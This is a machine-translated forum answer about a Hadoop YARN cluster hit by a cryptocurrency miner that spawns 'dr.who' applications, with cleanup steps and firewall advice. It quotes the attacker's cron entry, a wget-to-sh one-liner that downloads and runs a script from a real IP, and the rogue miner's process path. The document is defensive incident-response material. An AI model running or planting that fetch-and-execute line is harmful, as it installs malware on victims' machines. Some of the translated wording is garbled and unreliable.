问YARN Dr.who应用程序尝试应用失败

EN

这可能是个黑客..。有一个加密货币矿工创造了数千个这样的工作岗位。

检查每个节点上的cron作业是否有可疑的纱线并将其删除。

    $ sudo -u yarn crontab -e
*/2 * * * * wget -q -O - http://185.222.210.59/cr.sh | sh > /dev/null 2>&1

然后检查是否有像这样的"java“进程，并杀死它。

/var/tmp/java -c /var/tmp/wc.conf

您还应该保护集群的所有传入端口，以防止这种情况再次发生。

有关更多信息，请参阅此内容。https://community.hortonworks.com/questions/191898/hdp-261-virus-crytalminer-drwho.html

编辑：我在这里添加了关于如何处理这个问题的小指南Google Cloud Dataproc Virus CrytalMiner (dr.who)

可能正在给你带来什么：

• 黑客扫描每个打开的漏洞(IP地址+端口)，并将它们存储到攻击表
• 黑客扫描攻击表，并尝试找出您最近是否启动了群集
• 当有漏洞的群集可用时，黑客会连接到它(所有内容都是开放的，并且已经发现了漏洞！)
• 黑客连接到您的群集，删除所有内容(在我的情况下，脚本名为zz.sh，您可以在下面的BitBucket链接中找到它)，然后下载挖掘应用程序
• YARN认为工人正在失败，但我甚至不认为

应用程序正在运行。

我建议您尝试在错误日志中查找bitbucket/github地址。您还可以尝试查找get/wget/apt-get/curl命令。

我猜他现在很有钱了。

两件重要的事情：

未经公共授权即可检查您的安全组配置是否足够强大，并确保您的SSH密钥不是compromised.

与相关：

• how-to-use-the-resourcemanager-web-interface-as-an-user
• hdp-261-virus-crytalminer-drwho.html

在谷歌云上，一个机器人攻击端口8088和一个启动了许多纱线应用程序。1.在谷歌云中，我添加了一个防火墙规则来阻止8088访问。2.终止yarn yarn application -list |grep 'dr.who'| awk '$6 == "ACCEPTED" { print $1 }'| while read app; do yarn application -kill "$app"; done中的所有应用程序。3.终止所有属于yarn的进程(上一步释放cpu，但之后您的网络将耗尽) ps -ef |grep yarn |awk '{ print $2}'|while read p ; do sudo kill -9 $p; done。

现在使用控制台跟踪纱线;-)